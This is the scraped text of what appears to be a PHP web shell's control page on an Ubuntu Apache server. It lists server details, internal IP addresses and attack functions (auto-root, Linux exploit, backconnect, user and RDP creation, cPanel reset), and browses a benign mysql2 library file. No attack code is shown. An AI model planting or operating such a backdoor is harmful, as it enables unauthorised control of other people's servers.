Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
mysql2 /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
auth_plugins
[ DIR ]
drwxrwxr-x
commands
[ DIR ]
drwxrwxr-x
constants
[ DIR ]
drwxrwxr-x
packets
[ DIR ]
drwxrwxr-x
parsers
[ DIR ]
drwxrwxr-x
auth_41.js
2.27
KB
-rw-rw-r--
compressed_protocol.js
4.42
KB
-rw-rw-r--
connection.js
28.25
KB
-rw-rw-r--
connection_config.js
9.18
KB
-rw-rw-r--
helpers.js
1.68
KB
-rw-rw-r--
packet_parser.js
5.89
KB
-rw-rw-r--
pool.js
6.18
KB
-rw-rw-r--
pool_cluster.js
6.57
KB
-rw-rw-r--
pool_config.js
860
B
-rw-rw-r--
pool_connection.js
1.83
KB
-rw-rw-r--
results_stream.js
948
B
-rw-rw-r--
server.js
850
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pool_connection.js
'use strict'; const Connection = require('../index.js').Connection; class PoolConnection extends Connection { constructor(pool, options) { super(options); this._pool = pool; // The last active time of this connection this.lastActiveTime = Date.now(); // When a fatal error occurs the connection's protocol ends, which will cause // the connection to end as well, thus we only need to watch for the end event // and we will be notified of disconnects. // REVIEW: Moved to `once` this.once('end', () => { this._removeFromPool(); }); this.once('error', () => { this._removeFromPool(); }); } release() { if (!this._pool || this._pool._closed) { return; } // update last active time this.lastActiveTime = Date.now(); this._pool.releaseConnection(this); } promise(promiseImpl) { const PromisePoolConnection = require('../promise').PromisePoolConnection; return new PromisePoolConnection(this, promiseImpl); } end() { const err = new Error( 'Calling conn.end() to release a pooled connection is ' + 'deprecated. In next version calling conn.end() will be ' + 'restored to default conn.end() behavior. Use ' + 'conn.release() instead.' ); this.emit('warn', err); // eslint-disable-next-line no-console console.warn(err.message); this.release(); } destroy() { this._removeFromPool(); super.destroy(); } _removeFromPool() { if (!this._pool || this._pool._closed) { return; } const pool = this._pool; this._pool = null; pool._removeConnection(this); } } PoolConnection.statementKey = Connection.statementKey; module.exports = PoolConnection; // TODO: Remove this when we are removing PoolConnection#end PoolConnection.prototype._realEnd = Connection.prototype.end;
Close